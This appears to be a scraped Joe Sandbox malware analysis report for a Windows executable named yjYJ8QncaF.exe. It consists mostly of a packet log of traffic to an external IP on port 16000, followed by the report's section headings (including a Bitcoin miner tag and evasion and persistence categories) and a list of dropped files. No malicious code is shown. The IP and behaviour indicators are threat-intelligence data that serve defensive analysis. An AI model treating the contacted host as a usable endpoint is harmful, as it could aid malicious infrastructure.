Mar 6, 2025 08:09:12.660252094 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660290956 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660347939 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660360098 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660371065 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660382032 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660412073 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660430908 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660435915 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660535097 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660546064 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660558939 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660584927 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660587072 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660597086 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660608053 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660613060 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660619974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660638094 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660679102 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660701990 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660715103 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660726070 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660737991 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660757065 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660773039 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660789013 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660800934 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660836935 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.660947084 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660958052 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660969973 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660981894 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.660994053 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661001921 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661004066 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661015987 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661015987 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661026955 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661039114 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661048889 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661067009 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661077023 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661118984 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661196947 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661207914 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661218882 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661230087 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661242008 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661243916 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661252022 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661264896 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661273956 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661276102 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661293030 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661312103 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661379099 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661474943 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661494970 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661506891 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661518097 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661521912 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661530018 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661540031 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661551952 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661562920 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661564112 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661575079 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661581039 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661583900 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661592007 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661600113 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661602020 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661612988 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661621094 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661638021 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661652088 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661803007 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661815882 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661859989 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.661967039 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661978006 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.661988974 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662009001 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662009954 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662019968 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662031889 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662044048 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662045956 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662050962 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662055969 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662067890 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662080050 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662091017 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662101984 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662113905 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662126064 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662137985 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662149906 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662162066 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662162066 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662162066 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662162066 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662195921 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662412882 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662434101 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662446976 CET	16000	49733	45.144.212.77	192.168.2.4
Mar 6, 2025 08:09:12.662455082 CET	49733	16000	192.168.2.4	45.144.212.77
Mar 6, 2025 08:09:12.662458897 CET	16

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yjYJ8QncaF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_9383261a6d824d8c455af39aecd79066ba3bddaa_07ad8ade_aa756bfa-23f7-4123-9545-26aa21c7b1c7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_explorer.exe_9383261a6d824d8c455af39aecd79066ba3bddaa_07ad8ade_af73d1fb-3e26-4abb-a5b8-4af016b4adc3\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7E9F.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER846C.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER84EA.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8FB.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC96.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WERACD5.tmp.xml

Windows Analysis Report
yjYJ8QncaF.exe